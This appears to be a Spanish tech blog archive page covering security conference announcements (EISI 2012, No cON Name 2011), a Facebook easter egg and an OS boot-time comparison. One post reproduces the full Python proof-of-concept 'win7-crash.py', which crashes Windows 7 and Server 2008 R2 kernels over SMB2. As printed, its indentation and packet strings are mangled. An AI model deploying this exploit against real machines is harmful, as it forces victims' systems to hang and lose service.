Archives for 

encuentro

Si habra EISI en el 2012: EISI Security Conference

Quizas muchos de nosotros estabamos esperando que en Octubre de este año se realizara el 4 Encuentro Internacional de Seguridad Informatica que se celebra en la ciudad de Manizales. Desafortunadamente  me entere que este año no habra EISI debido a falta de apoyo y patrocinadores.

Sin embargo, no todas las noticias son malas, visitando la pagina de la comunidad DragonJAR me doy cuenta que el proximo año habra EISI 4 cargado de mucho conocimiento, en este evento habran grandes ponentes asi como tambien  grandes  talleres y Workshops,   de la misma forma como se organizan los grandes eventos en seguridad (DEFCON, EKOPARTY..)

Segun DragonJAR varias cosas nuevas son:

  • Tendremos 2 días capacitaciones altamente practicas con ponentes internacionales de la mas alta calidad
  • Tendremos 3 días de charlas, en su mayoría workshops y talleres
  • Durante los 3 días de charlas los asistentes al evento podrán disfrutar de una zona “Expo” donde podrán encontrar información de empresas, productos, servicios, rifas, exhibiciones, etc..
  • Contaremos con un CTF durante los 3 días del evento, con una muy buena premiación (podrían añadirse mas retos en un futuro).
Un poco mas del evento:
El evento se realizará en Manizales Caldas y la fecha tentativa para este gran evento es Marzo 26-30 del 2012, donde los días Marzo 26 y 27 serian las capacitaciones con los ponentes internacionales (pronto anunciaremos los nombres, duración y precio de estas) y los días 28, 29 y 30 de Marzo serian del evento como tal.
Para mas Informacion: visitar este link
Sin nada mas que decir, Nos vemos en Manizales…

El reto de la seguridad informática en el congreso No cON Name 2011

La asociación No cON Name, asociación sin ánimo de lucro fundada en Mallorca en 2002,reunió en 2010 a más de 300 expertos en seguridad informática de toda España en CosmoCaixa. El congreso se ha consolidado como uno de los encuentros de referencia del sur de Europa para técnicos del ámbito de la seguridad informática y busca la construcción de un foro abierto y libre donde converjan los conocimientos técnicos, el debate y la libre opinión.

La asociación anuncia que los días 16 y 17 de Septiembre de 2011 tendrá lugar en CosmoCaixa elcongreso No cON Name en su octava edición. El evento con más antigüedad en España,reunirá, a nuevas promesas, a expertos consolidados y profesionales en el campo de lainformática en general, redes telemáticas, programación o ingeniería de protección de software.La seguridad de equipos informáticos se ha convertido en la principal preocupación de empresas y particulares en los últimos tiempos. Por ello, la asociación hace un llamado anunciando la apertura de Propuesta de Ponencias o Call For Papers para todas aquellas personas que quieran presentar una ponencia enfocada tanto a análisis de sistemas inseguros,como a la aportación de ideas o proyectos que den un valor significativo a problemáticas deseguridad actuales y/o de futuro.

En esta edición, se estimulará la participación en proyectos de seguridad a través de concursosque la asociación creará para el propósito, donde se valorará el trabajo en equipos de múltiples disciplinas en el que potenciará la unidad del equipo y la solidaridad. Como puntos fuertes, el congreso se centrará en diversas áreas de la informática para el funcionamiento de los engranajes sociales, como por ejemplo los teléfonos móviles, la criticidad de la informática en dispositivos médicos que ayudan a salvar vidas humanas, los chips RFID y las tarjetas inteligentes, con usos tan diversos hoy en día como la identificación personal en los pasaportes, entidades bancarias o el acceso a instalaciones restringidas de alta seguridad, o los daños causados por una nueva clase de delincuentes en una nueva oleada decibercrimen.

La asociación tiene como uno de sus objetivos conseguir estimular una industria de la seguridad a través del intercambio y actualización del conocimiento entre los profesionales y expertos. Además, la asociación pretende, al mismo tiempo, llegar a los empresarios y ciudadanos para conseguir aumentar la concienciación sobre la importancia de la seguridad delos medios tecnológicos.

El plazo de presentación de propuestas para incluir un proyecto en el No cON Name 2011 ya está abierto y terminará el 31 de Mayo. La inscripción para los asistentes se abrirá 15 deMayo.

 

Nuevo truco en Facebook

Leyendo mis feeds, me encuentro con este huevo de pascua en la aplicacion facebook (No se si sea correcto llamarle asi, pero en mi opinion eso es lo que es).

el truco consiste en presionar una secuencia de teclas (al mejor estilo de los trucos de los juegos de video), y  si tienes un poco de suerte, aparecerán en la pantalla  una linea de círculos rojos, la secuencia que deben presionar es la siguiente:

Arriba, Arriba, Abajo, Abajo, izquierda, derecha, izquierda, derecha, B, A, ENTER, derecha, arriba, y abajo

Si lo hacen con algo de rapidez y coordinación obtendrán algo como esto:

No se cual sera la utilidad de esta secuencia de teclas, sin embargo es algo muy curioso,  característica principal de los huevos de pascua, Aca en Rincon Informatico hemos hablado un poco sobre los huevos de pascua y algunos ejemplos en GNU/Linux.

Nueva vulnerabilidad en Windows 7 y Windows 2008 server

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

Entre Windows y Ubuntu cual carga en menos tiempo??? averigualo!!

Leyendo algunos tweets me encuentro en este sitio, un vídeo muy interesante el cual nos muestra una computación, entre Microsoft y  GNU/Linux  la competencia tiene 2 bandos por cada lado, en el lado del mal participan Windows Vista, y el recién salido del Horno  Windows 7, mientras que por GNU/Linux participan Ubuntu 9.04 y el nuevo consentido Ubuntu 9.10

La idea del reto es bastante sencillo, el primero sistema operativo en arrancar… ¿Quien ganara? Hagan sus apuestas!!!!